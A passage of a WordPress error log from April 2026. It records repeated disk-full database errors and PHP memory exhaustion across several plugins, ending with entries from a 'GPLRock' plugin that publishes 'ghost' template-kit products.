WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e05-25b19.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e09-cdc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-404\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e09-cdd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e05-25b1a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-404\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e05-25b1b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [02-Apr-2026 18:13:15 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 53248 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Team_Member.php on line 1028 [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cb7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.* FROM wpwf_gplrock_products p LEFT JOIN wpwf_gplrock_ghost_content gc ON p.product_id = gc.product_id WHERE p.status = 'active' AND gc.id IS NULL ORDER BY p.id LIMIT 10 OFFSET 667 made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, GPLRock\Core->handle_auto_publish, GPLRock\Content::publish_ghost_products [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cb8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, GPLRock\Core->handle_auto_publish, GPLRock\Core->log [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cb9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, delete_transient, delete_option [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cba.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e47-b81.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e51-1f2c5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cbc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cbd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-404\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [02-Apr-2026 18:13:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cbe.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [02-Apr-2026 18:13:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e54-76a8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:19 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e51-1f2c7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:19 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e51-1f2c8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-404\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [02-Apr-2026 18:13:19 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e51-1f2c9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [02-Apr-2026 18:13:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 53248 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Team_Member.php on line 1028 [02-Apr-2026 18:13:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707ec8-c23.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707ed8-c65.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708145-c84.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:14:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7083eb-ba5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:14:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7085da-cf3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:14:51 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7089a5-540a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708bab-c9a4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708bf3-25479.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708e4e-ed6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:45 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709183-1d57a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:16:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709455-b1f1.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:16:22 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70963f-3067b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:16:52 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7099e7-31a1f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:17:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709bd3-1da42.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:17:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709c0a-5130.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:17:46 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a157-4db5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:18:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a474-dc8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:18:23 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a66c-b34.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:18:52 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70aa2c-b6a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:19:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70ac23-306f6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:19:09 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70ac83-1ecf6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:19:48 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b256-29cdb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:20:09 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b557-d21.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:20:24 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b766-bbd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:21:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70bd2f-d29.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:21:09 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70bd6c-f15.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:21:50 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c2e2-f67.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:22:10 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c5f7-be8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:22:25 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c7fe-1ad22.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:23:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 2621440 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/litespeed-cache/src/activation.cls.php on line 26 [02-Apr-2026 18:25:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70e3a8-e4f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:27:52 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70f34c-1da4b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:56:26 UTC] GPLRock: Image downloaded successfully for product otowash-car-washing-cleaning-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-764fe209.jpg [02-Apr-2026 18:56:26 UTC] GPLRock: Using pre-downloaded image for product otowash-car-washing-cleaning-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-764fe209.jpg [02-Apr-2026 18:56:26 UTC] GPLRock: Ghost product published with image - Product ID: otowash-car-washing-cleaning-services-elementor-template-kit [02-Apr-2026 18:56:28 UTC] GPLRock: Image downloaded successfully for product orifarm-organic-farm-agriculture-elementor-template-kit (attempt 1) to: 